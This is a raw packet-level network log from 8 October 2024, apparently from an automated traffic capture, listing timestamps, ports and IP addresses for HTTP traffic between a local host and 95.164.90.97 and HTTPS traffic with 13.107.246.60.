Oct 8, 2024 20:47:29.240035057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240055084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240080118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240191936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240201950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240212917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240223885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240235090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240242958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240251064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240262985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240263939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240282059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240309000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240437984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240448952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240459919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240470886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240483999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240490913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240495920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240508080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240509033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240531921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240557909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240695000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240705967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240715981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240745068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240757942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240823030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240833998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240843058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240854025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240864992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240870953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240875959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240886927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240897894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240900993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240907907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240912914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240920067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.240942001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.240964890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.304732084 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.304872036 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.305128098 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.305129051 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.305129051 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.305900097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306051016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306061983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306118011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306186914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306197882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306207895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306216955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306238890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306262016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306273937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306283951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306293011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306304932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306318998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306338072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306346893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306360006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306385994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306557894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306567907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306576967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306592941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306605101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306622028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306632042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306634903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306642056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306652069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306663036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306670904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306677103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306690931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306699991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.306701899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306729078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.306740999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307071924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307084084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307092905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307101965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307115078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307125092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307152033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307419062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307430029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307456970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307467937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307472944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307477951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307487965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307498932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307499886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307528019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307532072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307543039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307543039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307574987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307620049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307630062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307638884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307658911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307667971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307670116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307682037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307684898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307694912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307706118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307720900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307748079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.307892084 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.307943106 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.307986021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.307996988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308007002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308017969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308027029 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.308037996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.308064938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.308161020 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.308175087 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.308583021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308629990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.308641911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308653116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308685064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.308695078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.308748960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308758974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308769941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308782101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308799028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.308825016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.308954954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308965921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308975935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308988094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.308999062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.309009075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.309011936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.309020996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.309041977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.309075117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.309362888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.309412003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.309909105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.309926987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.309936047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.309957981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.309974909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.310065985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310075998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310086012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310097933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310111046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310112000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.310131073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.310153008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.310240030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310250044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310259104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310271025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310286999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.310305119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.310357094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310367107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.310398102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327435017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327460051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327470064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327574968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327574968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327619076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327650070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327663898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327673912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327681065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327709913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327862978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327872992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327882051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327893972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327904940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327913046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327914953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327927113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327931881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327939987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327950954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.327959061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327982903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.327996016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328402042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328412056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328422070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328433037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328445911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328454018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328457117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328483105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328499079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328587055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328598022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328608990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328619003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328629971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328639984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328640938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328668118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328677893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328757048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328768015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328778028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328788996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328799963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328807116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328810930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328820944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.328830957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328846931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.328856945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.329061031 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.329468966 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.329484940 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.329885960 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.329890966 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.397439003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.397450924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.397461891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.397495985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.397512913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.397919893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.397931099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.397941113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.397954941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.397974968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.397995949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398062944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398073912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398082972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398092985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398103952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398114920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398116112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398127079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398133993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398138046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398144960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398149967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398173094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398197889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398710966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398721933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398731947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398742914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398755074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398765087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398797989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398893118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398902893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398911953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398921967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398938894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398947001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398957014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398957968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398969889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398978949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.398981094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398991108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.398996115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399002075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399013042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399022102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399024010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399035931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399039984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399048090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399056911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399060011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399070978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399080992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399080992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399091959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399104118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399106979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399116039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399123907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399146080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399168015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.399945974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399956942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399966955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399976015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.399986029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400006056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400011063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.400017023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400027037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400037050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400037050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.400047064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400057077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400059938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.400059938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.400067091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400075912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400084972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400095940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400099039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.400105953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.400127888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.400146961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.429868937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.435579062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.436733961 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.437048912 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.437385082 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.437654018 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.437666893 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.437675953 CEST	49814	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.437680006 CEST	443	49814	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.440831900 CEST	49819	443	192.168.2.5	13.107.246.60
